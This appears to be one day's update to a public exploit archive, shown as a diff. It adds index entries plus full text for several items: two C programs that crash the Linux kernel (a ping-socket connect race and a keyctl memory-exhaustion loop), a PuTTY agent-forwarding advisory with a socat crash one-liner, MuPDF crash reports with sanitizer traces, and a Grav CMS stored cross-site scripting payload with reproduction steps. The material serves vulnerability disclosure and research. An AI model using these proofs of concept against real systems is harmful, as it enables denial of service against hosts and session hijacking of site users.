DB: 2017-06-08

9 new exploits

Linux Kernel - 'ping' Local Denial of Service
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service
PuTTY < 0.68 - 'ssh_agent_channel_data' Integer Overflow Heap Corruption
Artifex MuPDF - Null Pointer Dereference
Artifex MuPDF mujstest 1.10a - Null Pointer Dereference

DC/OS Marathon UI - Docker Exploit (Metasploit)
Grav CMS 1.4.2 Admin Plugin - Cross-Site Scripting
Xavier 2.4 - SQL Injection
Robert 0.5 - Multiple Vulnerabilities

files.csv

@@ -5530,6 +5530,11 @@ id,file,description,date,author,platform,type,port
 42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow",2017-06-05,FarazPajohan,linux,dos,0
 42123,platforms/multiple/dos/42123.txt,"Wireshark 2.2.6 - IPv6 Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
 42124,platforms/multiple/dos/42124.txt,"Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
+42135,platforms/linux/dos/42135.c,"Linux Kernel - 'ping' Local Denial of Service",2017-06-07,"Daniel Jiang",linux,dos,0
+42136,platforms/linux/dos/42136.c,"Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service",2017-06-07,"Marcus Meissner",linux,dos,0
+42137,platforms/linux/dos/42137.txt,"PuTTY < 0.68 - 'ssh_agent_channel_data' Integer Overflow Heap Corruption",2017-06-07,"Tim Kosse",linux,dos,22
+42138,platforms/linux/dos/42138.txt,"Artifex MuPDF - Null Pointer Dereference",2017-06-07,"Kamil Frankowicz",linux,dos,0
+42139,platforms/linux/dos/42139.txt,"Artifex MuPDF mujstest 1.10a - Null Pointer Dereference",2017-02-17,"Agostino Sarubbo",linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -15569,6 +15574,7 @@ id,file,description,date,author,platform,type,port
 42079,platforms/hardware/remote/42079.txt,"CERIO DT-100G-N/DT-300N/CW-300N - Multiple Vulnerabilities",2017-05-28,LiquidWorm,hardware,remote,0
 42125,platforms/macos/remote/42125.txt,"Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution",2017-06-06,saelo,macos,remote,0
 42128,platforms/windows/remote/42128.txt,"Home Web Server 1.9.1 build 164 - Remote Code Execution",2017-05-26,"Guillaume Kaddouch",windows,remote,0
+42134,platforms/python/remote/42134.rb,"DC/OS Marathon UI - Docker Exploit (Metasploit)",2017-06-07,Metasploit,python,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37960,3 +37966,6 @@ id,file,description,date,author,platform,type,port
 42127,platforms/asp/webapps/42127.txt,"Kronos Telestaff < 2.92EU29 - SQL Injection",2017-06-05,"Goran Tuzovic",asp,webapps,0
 42129,platforms/php/webapps/42129.txt,"WordPress Plugin Tribulant Newsletters 4.6.4.2 - File Disclosure / Cross-Site Scripting",2017-06-06,defensecode,php,webapps,80
 42130,platforms/cgi/webapps/42130.txt,"Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure",2017-06-06,"X41 D-Sec GmbH",cgi,webapps,443
+42131,platforms/php/webapps/42131.txt,"Grav CMS 1.4.2 Admin Plugin - Cross-Site Scripting",2017-06-07,"Ahsan Tahir",php,webapps,0
+42132,platforms/php/webapps/42132.txt,"Xavier 2.4 - SQL Injection",2017-06-07,Vulnerability-Lab,php,webapps,0
+42133,platforms/php/webapps/42133.txt,"Robert 0.5 - Multiple Vulnerabilities",2017-06-07,"Cyril Vallicari",php,webapps,0

platforms/linux/dos/42135.c

@@ -0,0 +1,30 @@
+# Source: https://raw.githubusercontent.com/danieljiang0415/android_kernel_crash_poc/master/panic.c
+#
+#include <stdio.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <stdlib.h>
+static int sockfd = 0;
+static struct sockaddr_in addr = {0};
+
+void fuzz(void * param){
+    while(1){
+        addr.sin_family = 0;//rand()%42;
+        printf("sin_family1 = %08lx\n", addr.sin_family);
+        connect(sockfd, (struct sockaddr *)&addr, 16); 
+    }
+}
+int main(int argc, char **argv)
+{
+    sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
+    int thrd;
+    pthread_create(&thrd, NULL, fuzz, NULL);
+    while(1){
+        addr.sin_family = 0x1a;//rand()%42;
+        addr.sin_port = 0;
+        addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+        connect(sockfd, (struct sockaddr *)&addr, 16);
+        addr.sin_family = 0;
+    }
+    return 0;
+}

platforms/linux/dos/42136.c

@@ -0,0 +1,17 @@
+/*
+Source: https://bugzilla.novell.com/show_bug.cgi?id=1034862
+QA REPRODUCER:
+
+gcc -O2 -o CVE-2017-7472 CVE-2017-7472.c -lkeyutils
+./CVE-2017-7472
+
+(will run the kernel out of memory)
+*/
+#include <sys/types.h>
+#include <keyutils.h>
+
+int main()
+{
+	for (;;)
+		keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
+}

platforms/linux/dos/42137.txt

@@ -0,0 +1,24 @@
+Source: https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-agent-fwd-overflow.html
+
+summary: Vulnerability: integer overflow permits memory overwrite by forwarded ssh-agent connections
+class: vulnerability: This is a security vulnerability.
+difficulty: fun: Just needs tuits, and not many of them.
+priority: high: This should be fixed in the next release.
+present-in: 0.67
+fixed-in: 4ff22863d895cb7ebfced4cf923a012a614adaa8 (0.68)
+
+Many versions of PuTTY prior to 0.68 have a heap-corrupting integer overflow bug in the ssh_agent_channel_data function which processes messages sent by remote SSH clients to a forwarded agent connection.
+
+The agent protocol begins every message with a 32-bit length field, which gives the length of the remainder of the message, not including the length field itself. In order to accumulate the entire message including the length field in an internal buffer, PuTTY added 4 to the received length value, to obtain the message length inclusive of everything. This addition was unfortunately missing a check for unsigned integer overflow.
+
+Hence, sending a length field large enough to overflow when 4 is added to it, such as 0xFFFFFFFD, would cause PuTTY to record a value for the total message length (totallen) which was smaller than the amount of data it had already seen (lensofar, which at this point would be 4 bytes for the length field itself). Then, it would assume that the expression totallen-lensofar represented the amount of space it was safe to write into its buffer – but in fact, in the overflowing case, this value would wrap back round to a number just less than 232, far larger than the allocated heap block, and PuTTY could be induced to overwrite its heap with data sent by the attacker.
+
+If your server is running Linux or any reasonably similar Unix, and has the socat network utility installed, then you can use this simple proof of concept to determine whether you are affected. Simply run the shell command
+
+(echo -ne '\xFF\xFF\xFF\xFD\x0B'; cat /dev/zero) | socat stdio unix-connect:$SSH_AUTH_SOCK
+
+and PuTTY will crash.
+
+This bug is only exploitable at all if you have enabled SSH agent forwarding, which is turned off by default. Moreover, an attacker able to exploit this bug would have to have already be able to connect to the Unix-domain socket representing the forwarded agent connection. Since any attacker with that capability would necessarily already be able to generate signatures with your agent's stored private keys, you should in normal circumstances be defended against this vulnerability by the same precautions you and your operating system were already taking to prevent untrusted people from accessing your SSH agent.
+
+This vulnerability was reported by Tim Kosse, and has been assigned CVE ID CVE-2017-6542.

platforms/linux/dos/42138.txt

@@ -0,0 +1,45 @@
+Source: https://bugs.ghostscript.com/show_bug.cgi?id=697500
+
+POC to trigger null pointer dereference (mutool)
+
+After some fuzz testing I found a crashing test case.
+
+Git HEAD: 8eea208e099614487e4bd7cc0d67d91489dae642
+
+To reproduce: mutool convert -F cbz nullptr_fz_paint_pixmap_with_mask -o /dev/null
+
+ASAN:
+
+==1406==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x000000849633 bp 0x7ffdb430c750 sp 0x7ffdb430c620 T0)
+==1406==The signal is caused by a READ memory access.
+==1406==Hint: address points to the zero page.
+    #0 0x849632 in fz_paint_pixmap_with_mask XYZ/mupdf/source/fitz/draw-paint.c:1948:2
+    #1 0x60208c in fz_draw_pop_clip XYZ/mupdf/source/fitz/draw-device.c:1618:4
+    #2 0x54e716 in fz_pop_clip XYZ/mupdf/source/fitz/device.c:301:3
+    #3 0x8fb76f in pdf_grestore XYZ/mupdf/source/pdf/pdf-op-run.c:338:4
+    #4 0x901149 in pdf_run_xobject XYZ/mupdf/source/pdf/pdf-op-run.c:1347:5
+    #5 0x8ffa0f in begin_softmask XYZ/mupdf/source/pdf/pdf-op-run.c:148:3
+    #6 0x8fac2f in pdf_begin_group XYZ/mupdf/source/pdf/pdf-op-run.c:188:23
+    #7 0x8fac2f in pdf_show_shade XYZ/mupdf/source/pdf/pdf-op-run.c:219
+    #8 0x8fac2f in pdf_run_sh XYZ/mupdf/source/pdf/pdf-op-run.c:1943
+    #9 0x92cc20 in pdf_process_keyword XYZ/mupdf/source/pdf/pdf-interpret.c:770:5
+    #10 0x929741 in pdf_process_stream XYZ/mupdf/source/pdf/pdf-interpret.c:953:6
+    #11 0x92870f in pdf_process_contents XYZ/mupdf/source/pdf/pdf-interpret.c:1043:3
+    #12 0x8e9edc in pdf_run_page_contents_with_usage XYZ/mupdf/source/pdf/pdf-run.c:46:3
+    #13 0x8e99c7 in pdf_run_page_contents XYZ/mupdf/source/pdf/pdf-run.c:69:3
+    #14 0x553e12 in fz_run_page_contents XYZ/mupdf/source/fitz/document.c:318:4
+    #15 0x55423b in fz_run_page XYZ/mupdf/source/fitz/document.c:350:2
+    #16 0x4e8021 in runpage XYZ/mupdf/source/tools/muconvert.c:67:2
+    #17 0x4e7d85 in runrange XYZ/mupdf/source/tools/muconvert.c:83:5
+    #18 0x4e76c7 in muconvert_main XYZ/mupdf/source/tools/muconvert.c:165:4
+    #19 0x4e6943 in main XYZ/mupdf/source/tools/mutool.c:112:12
+    #20 0x7f6d6818a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
+    #21 0x41a218 in _start (XYZ/mupdf/build/debug/mutool+0x41a218)
+
+AddressSanitizer can not provide additional info.
+SUMMARY: AddressSanitizer: SEGV XYZ/mupdf/source/fitz/draw-paint.c:1948:2 in fz_paint_pixmap_with_mask
+==1406==ABORTING
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42138.zip

platforms/linux/dos/42139.txt

@@ -0,0 +1,100 @@
+Source: http://seclists.org/oss-sec/2017/q1/458
+
+Description:
+Mujstest, which is part of mupdf is a scriptable tester for mupdf + js.
+
+A crafted image posted early for another issue, causes a stack overflow.
+
+The complete ASan output:
+
+# mujstest $FILE
+==32127==ERROR: AddressSanitizer: stack-buffer-overflow on address 
+0x7fff29560b00 at pc 0x00000047cbf3 bp 0x7fff29560630 sp 0x7fff2955fde0
+WRITE of size 1453 at 0x7fff29560b00 thread T0
+    #0 0x47cbf2 in __interceptor_strcpy /tmp/portage/sys-devel/llvm-3.9.1-
+r1/work/llvm-3.9.1.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:548
+    #1 0x50e903 in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-
+source/platform/x11/jstest_main.c:358:7
+    #2 0x7f68df3c578f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-
+r3/work/glibc-2.23/csu/../csu/libc-start.c:289
+    #3 0x41bc18 in _init (/usr/bin/mujstest+0x41bc18)
+
+Address 0x7fff29560b00 is located in stack of thread T0 at offset 1056 in 
+frame
+    #0 0x50c45f in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-
+source/platform/x11/jstest_main.c:293
+
+  This frame has 7 object(s):
+    [32, 1056) 'path'
+    [1184, 2208) 'text' <== Memory access at offset 1056 partially underflows 
+this variable
+    [2336, 2340) 'w' <== Memory access at offset 1056 partially underflows 
+this variable
+    [2352, 2356) 'h' <== Memory access at offset 1056 partially underflows 
+this variable
+    [2368, 2372) 'x' <== Memory access at offset 1056 partially underflows 
+this variable
+    [2384, 2388) 'y' <== Memory access at offset 1056 partially underflows 
+this variable
+    [2400, 2404) 'b' 0x1000652a4160:[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 
+f2 f2
+  0x1000652a4170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1000652a4180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1000652a4190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1000652a41a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1000652a41b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==32127==ABORTING
+
+Affected version:
+1.10a
+
+Fixed version:
+N/A
+
+Commit fix:
+N/A
+
+Credit:
+This bug was discovered by Agostino Sarubbo of Gentoo.
+
+CVE:
+CVE-2017-6060
+
+Reproducer:
+https://github.com/asarubbo/poc/blob/master/00147-mupdf-mujstest-stackoverflow-main
+
+Timeline:
+2017-02-05: bug discovered and reported to upstream
+2017-02-17: blog post about the issue
+2017-02-17: CVE assigned via cveform.mitre.org
+
+Note:
+This bug was found with Address Sanitizer.
+
+Permalink:
+https://blogs.gentoo.org/ago/2017/02/17/mupdf-mujstest-stack-based-buffer-overflow-in-main-jstest_main-c
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42139.zip

platforms/php/webapps/42131.txt

@@ -0,0 +1,75 @@
+# Exploit Title: GravCMS Core (Admin Plugin) v1.4.2 - Persistent Cross-Site Scripting
+# Date: 2017-06-07
+# Exploit Author: Ahsan Tahir
+# Vendor Homepage: https://getgrav.org/
+# Software Link: https://getgrav.org/download/core/grav-admin/1.2.4
+# Version: 1.4.2
+# Tested on: [Kali Linux 2.0 | Windows 8.1]
+# Email: [email protected]
+# Contact: https://twitter.com/AhsanTahirAT
+
+Release Date:
+=============
+2017-06-07
+
+
+Product & Service Introduction:
+===============================
+Grav is built and maintained by a team of dedicated and passionate developers, designers and users. 
+As Grav is an open source project we greatly appreciate user contribution and commitment. These are the key folks that make this all possible.
+
+
+Abstract Advisory Information:
+==============================
+Ahsan Tahir, an independent vulnerability researcher discovered a Persistent Cross-Site Scripting Vulnerability in GravCMS Admin Plugin (v 1.4.2)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2017-06-07: Found the vulnerability.
+2017-06-07: Reported to vendor.
+2017-06-07: Published.
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+The security risk of the xss vulnerability is estimated as medium with a common vulnerability scoring system count of 3.6. 
+Exploitation of the persistent xss web vulnerability requires a limited admin user account and only low user interaction. 
+Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external 
+redirect to malicious sources and persistent manipulation of affected or connected web module context.
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation vulnerability can be exploited by restricted user accounts with low user interaction.
+For security demonstraton or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+Payload (Exploitation): [Click Me](javascript:alert(1))
+
+[+] Manual steps to reproduce ..
+1. Login with the admin or editor account in GravCMS
+2. Go to edit page option (e.g http://127.0.0.1/cms/grav-admin/admin/pages/home)
+3. Put the payload "[Click Me](javascript:alert(1))" (without quotes) in the content of page
+4. Save Page!
+5. Go to the index page (e.g http://127.0.0.1/cms/grav-admin/)
+6. Click on "Click Me"
+7. The Javascript execution occurs - Successful reproduce of the persistent cross site scripting vulnerability!
+
+
+Credits & Authors:
+==================
+Ahsan Tahir - [https://twitter.com/AhsanTahirAT]